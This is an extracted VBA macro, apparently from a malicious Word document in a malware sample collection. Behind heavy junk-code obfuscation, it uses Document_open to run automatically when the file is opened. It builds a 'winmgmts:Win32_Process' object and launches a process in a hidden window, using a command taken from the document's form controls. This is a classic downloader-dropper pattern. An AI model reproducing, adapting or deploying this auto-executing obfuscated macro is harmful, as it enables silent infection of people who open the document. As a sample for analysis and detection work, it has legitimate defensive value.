Attribute VB_Name = "Ezginepp"
Function Tfjsdtdrfdqe()
   If Miiybeapa > Zhrkxbxvs Then
      Vgamdkxlwpw = 32 - Chr(344 / Chr(24) / 443 + Atn(balo6)) + DadI390I + Round(KfCUV5w) + Abwy * Rnd(32 / 44 * tZmW6V0 + Int(oYXyH04B)) + sdMWB * Log(15 / 2) * fmcL3z1hR + oIPN6s
   End If
      Select Case Gqzkquhkfhft
         Case 551
            Xkjyapzn = Obqrospdyydhb
            Xjdpyvtjj = Mrvtutob
         Case 456
            Epvnscuvxqi = 655
            Dfvxdcvrgsof = Rnd(80 + Sgn(rqGDOw / ChrB(12 + 33) / bmYW42 / Log(1 * ChrB(5) + 7 * jByfs1)))
End Select
Qrfcbvjq = Tmcseqalycivq.Hiskrubwk
   If Colsuewkapgn > Pmaklmevyle Then
      Rvlunnyti = 32 - Chr(344 / Chr(24) / 443 + Atn(balo6)) + DadI390I + Round(KfCUV5w) + Abwy * Rnd(32 / 44 * tZmW6V0 + Int(oYXyH04B)) + sdMWB * Log(15 / 2) * fmcL3z1hR + oIPN6s
   End If
      Select Case Runoyvey
         Case 551
            Mybdcrphqzos = Oousajugw
            Rzqxchfonewj = Wjmspozyiz
         Case 456
            Lyeafcel = 655
            Zjnsieiasfdh = Rnd(80 + Sgn(rqGDOw / ChrB(12 + 33) / bmYW42 / Log(1 * ChrB(5) + 7 * jByfs1)))
End Select
Dbxzzmzefovka = Qrfcbvjq + Gqgldrrubjzk.Yznfuycpbs + Gqgldrrubjzk.Ybpfkqbsxt + Gqgldrrubjzk.Nnatlcnalipo
   If Zthhfyyum > Lssntyoef Then
      Bsapjwxqzoi = 32 - Chr(344 / Chr(24) / 443 + Atn(balo6)) + DadI390I + Round(KfCUV5w) + Abwy * Rnd(32 / 44 * tZmW6V0 + Int(oYXyH04B)) + sdMWB * Log(15 / 2) * fmcL3z1hR + oIPN6s
   End If
      Select Case Kacdhttuhamsv
         Case 551
            Brqvtlsph = Bwvntduudtw
            Lsuusnwnappiy = Nrlvnrrx
         Case 456
            Hjxbtpfgtkar = 655
            Ttbbhgevqqhli = Rnd(80 + Sgn(rqGDOw / ChrB(12 + 33) / bmYW42 / Log(1 * ChrB(5) + 7 * jByfs1)))
End Select
Tbnigstdiij = Dbxzzmzefovka + Gqgldrrubjzk.Uaxosqqd + Gqgldrrubjzk.Vclecsrfs
   If Fuiqmffykxton > Wwoslzam Then
      Roeojyhxcfwki = 32 - Chr(344 / Chr(24) / 443 + Atn(balo6)) + DadI390I + Round(KfCUV5w) + Abwy * Rnd(32 / 44 * tZmW6V0 + Int(oYXyH04B)) + sdMWB * Log(15 / 2) * fmcL3z1hR + oIPN6s
   End If
      Select Case Mscbfgogweytd
         Case 551
            Ehvturbjbzmql = Moisygylg
            Hhkkedwf = Oolikibctqc
         Case 456
            Sklkcpfwpdr = 655
            Yquitfxrxzwk = Rnd(80 + Sgn(rqGDOw / ChrB(12 + 33) / bmYW42 / Log(1 * ChrB(5) + 7 * jByfs1)))
End Select
Tfjsdtdrfdqe = Buarybpqe + Tbnigstdiij + Buarybpqe
   If Vxmprdvl > Mqliawxs Then
      Ucfzuikrved = 32 - Chr(344 / Chr(24) / 443 + Atn(balo6)) + DadI390I + Round(KfCUV5w) + Abwy * Rnd(32 / 44 * tZmW6V0 + Int(oYXyH04B)) + sdMWB * Log(15 / 2) * fmcL3z1hR + oIPN6s
   End If
      Select Case Qcqrcoursu
         Case 551
            Acvujzgpsgs = Vjteqxyqevf
            Udxwbiaiu = Wmfxhsjkyeh
         Case 456
            Mcxhavgp = 655
            Edrvfkrea = Rnd(80 + Sgn(rqGDOw / ChrB(12 + 33) / bmYW42 / Log(1 * ChrB(5) + 7 * jByfs1)))
End Select
End Function
Function Ylzhgitsj()
   If Lwaidezricpy > Lyvdlluhhuke Then
      Ajsgsydlvuxbu = 32 - Chr(344 / Chr(24) / 443 + Atn(balo6)) + DadI390I + Round(KfCUV5w) + Abwy * Rnd(32 / 44 * tZmW6V0 + Int(oYXyH04B)) + sdMWB * Log(15 / 2) * fmcL3z1hR + oIPN6s
   End If
      Select Case Xppuutfraxdae
         Case 551
            Yysbqzjif = Zdafkqkkjfv
            Evssjpyzwpwz = Twogkveucqvn
         Case 456
            Tfacnaxvhqz = 655
            Rdnefbxr = Rnd(80 + Sgn(rqGDOw / ChrB(12 + 33) / bmYW42 / Log(1 * ChrB(5) + 7 * jByfs1)))
End Select
Stxmdkgrdgy = "winmgmt" + "s:Win32_Process"
   If Dhdcdqbw > Eflkafmtypm Then
      Hifkjgytyquoi = 32 - Chr(344 / Chr(24) / 443 + Atn(balo6)) + DadI390I + Round(KfCUV5w) + Abwy * Rnd(32 / 44 * tZmW6V0 + Int(oYXyH04B)) + sdMWB * Log(15 / 2) * fmcL3z1hR + oIPN6s
   End If
      Select Case Pnolragwucahi
         Case 551
            Tsjjwtxgsptuf = Wsqoelbacxam
            Izqebxcez = Rgwvxgahd
         Case 456
            Rtklsrglvh = 655
            Jqdpdrprsxjme = Rnd(80 + Sgn(rqGDOw / ChrB(12 + 33) / bmYW42 / Log(1 * ChrB(5) + 7 * jByfs1)))
End Select
Set Mszzvlxdlfl = CreateObject(Stxmdkgrdgy)
   If Uxojwmpsro > Butxcugwkx Then
      Locyfujksx = 32 - Chr(344 / Chr(24) / 443 + Atn(balo6)) + DadI390I + Round(KfCUV5w) + Abwy * Rnd(32 / 44 * tZmW6V0 + Int(oYXyH04B)) + sdMWB * Log(15 / 2) * fmcL3z1hR + oIPN6s
   End If
      Select Case Jaulhbkgnab
         Case 551
            Xgkcxbwheyik = Xeasdaeobz
            Injwkmzdinz = Wxiecmbqpncm
         Case 456
            Bqjekhisixinv = 655
            Ejesxgdwkym = Rnd(80 + Sgn(rqGDOw / ChrB(12 + 33) / bmYW42 / Log(1 * ChrB(5) + 7 * jByfs1)))
End Select
Frrmybdqnn = Stxmdkgrdgy + ("STARTU")
   If Czojijwck > Lfkuingfxyej Then
      Qtfkatctc = 32 - Chr(344 / Chr(24) / 443 + Atn(balo6)) + DadI390I + Round(KfCUV5w) + Abwy * Rnd(32 / 44 * tZmW6V0 + Int(oYXyH04B)) + sdMWB * Log(15 / 2) * fmcL3z1hR + oIPN6s
   End If
      Select Case Jqkqgpcqnuol
         Case 551
            Pwafjyqq = Qrrjspsdydzw
            Rjcsknbhwik = Ntnbsqsz
         Case 456
            Sxyclnfcsakoz = 655
            Fmqjuizunfkkc = Rnd(80 + Sgn(rqGDOw / ChrB(12 + 33) / bmYW42 / Log(1 * ChrB(5) + 7 * jByfs1)))
End Select
Skbejfkwdny = Frrmybdqnn + Tmcseqalycivq.Hiskrubwk
   If Mmeprkkecju > Stjsnkxqs Then
      Ztmkxzbayrjfn = 32 - Chr(344 / Chr(24) / 443 + Atn(balo6)) + DadI390I + Round(KfCUV5w) + Abwy * Rnd(32 / 44 * tZmW6V0 + Int(oYXyH04B)) + sdMWB * Log(15 / 2) * fmcL3z1hR + oIPN6s
   End If
      Select Case Ehjhwfbimosbo
         Case 551
            Aukiqxyz = Huwniovg
            Phkfrxlzw = Njurpufvzghbe
         Case 456
            Fuezxvxkot = 655
            Qtmydcful = Rnd(80 + Sgn(rqGDOw / ChrB(12 + 33) / bmYW42 / Log(1 * ChrB(5) + 7 * jByfs1)))
End Select
Set Ylzhgitsj = CreateObject((Skbejfkwdny))
   If Rexdwpmi > Bhbatchwqdmet Then
      Ltzunjbvhnnfd = 32 - Chr(344 / Chr(24) / 443 + Atn(balo6)) + DadI390I + Round(KfCUV5w) + Abwy * Rnd(32 / 44 * tZmW6V0 + Int(oYXyH04B)) + sdMWB * Log(15 / 2) * fmcL3z1hR + oIPN6s
   End If
      Select Case Ufrmpqpkt
         Case 551
            Glaomkif = Mnmoamtmfweli
            Mhagvjfxl = Utacxxalhre
         Case 456
            Evxoayvdrgz = 655
            Zomgqblkr = Rnd(80 + Sgn(rqGDOw / ChrB(12 + 33) / bmYW42 / Log(1 * ChrB(5) + 7 * jByfs1)))
End Select
Ylzhgitsj.XSize = 0
   If Wjfsawylioi > Jziqijjncmwqi Then
      Iwtfrzqcxqidy = 32 - Chr(344 / Chr(24) / 443 + Atn(balo6)) + DadI390I + Round(KfCUV5w) + Abwy * Rnd(32 / 44 * tZmW6V0 + Int(oYXyH04B)) + sdMWB * Log(15 / 2) * fmcL3z1hR + oIPN6s
   End If
      Select Case Roypubyfn
         Case 551
            Auxjcrlzcmvdq = Xkazglxwvhrt
            Jqfqvzvfnoqry = Vkipbenfnikc
         Case 456
            Bkyvbtwp = 655
            Axrxljomkezx = Rnd(80 + Sgn(rqGDOw / ChrB(12 + 33) / bmYW42 / Log(1 * ChrB(5) + 7 * jByfs1)))
End Select
Ylzhgitsj.YSize = 0
   If Clkddgvzr > Rwytodetcy Then
      Jitbgkzfzmfcu = 32 - Chr(344 / Chr(24) / 443 + Atn(balo6)) + DadI390I + Round(KfCUV5w) + Abwy * Rnd(32 / 44 * tZmW6V0 + Int(oYXyH04B)) + sdMWB * Log(15 / 2) * fmcL3z1hR + oIPN6s
   End If
      Select Case Zquqfraa
         Case 551
            Ljcguyjjpav = Pprojervz
            Fciimejhnmubx = Owsfpiple
         Case 456
            Dqwosmkdbrp = 655
            Krowsunupdqvd = Rnd(80 + Sgn(rqGDOw / ChrB(12 + 33) / bmYW42 / Log(1 * ChrB(5) + 7 * jByfs1)))
End Select
Do While Mszzvlxdlfl.Create(Tfjsdtdrfdqe, Dwoelhibf, Ylzhgitsj)
Loop
   If Jzqwuyqtwwpsi > Qmbrctyszqtw Then
      Edeajpjfbevb = 32 - Chr(344 / Chr(24) / 443 + Atn(balo6)) + DadI390I + Round(KfCUV5w) + Abwy * Rnd(32 / 44 * tZmW6V0 + Int(oYXyH04B)) + sdMWB * Log(15 / 2) * fmcL3z1hR + oIPN6s
   End If
      Select Case Jpnwxuqalvx
         Case 551
            Grfachzstk = Ciklxwbhijkcw
            Cdsjdfedovd = Mxqewyulgpny
         Case 456
            Cxhddcsxoabot = 655
            Wptdhultf = Rnd(80 + Sgn(rqGDOw / ChrB(12 + 33) / bmYW42 / Log(1 * ChrB(5) + 7 * jByfs1)))
End Select
End Function
Attribute VB_Name = "Gqgldrrubjzk"
Attribute VB_Base = "0{236EF83B-F9A9-45F7-809C-A637E2235208}{6BEE58EA-348E-4C2C-8626-C869DB8596A2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Tmcseqalycivq"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Hiskrubwk, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Ylzhgitsj
End Sub


INQUEST-PP=macro
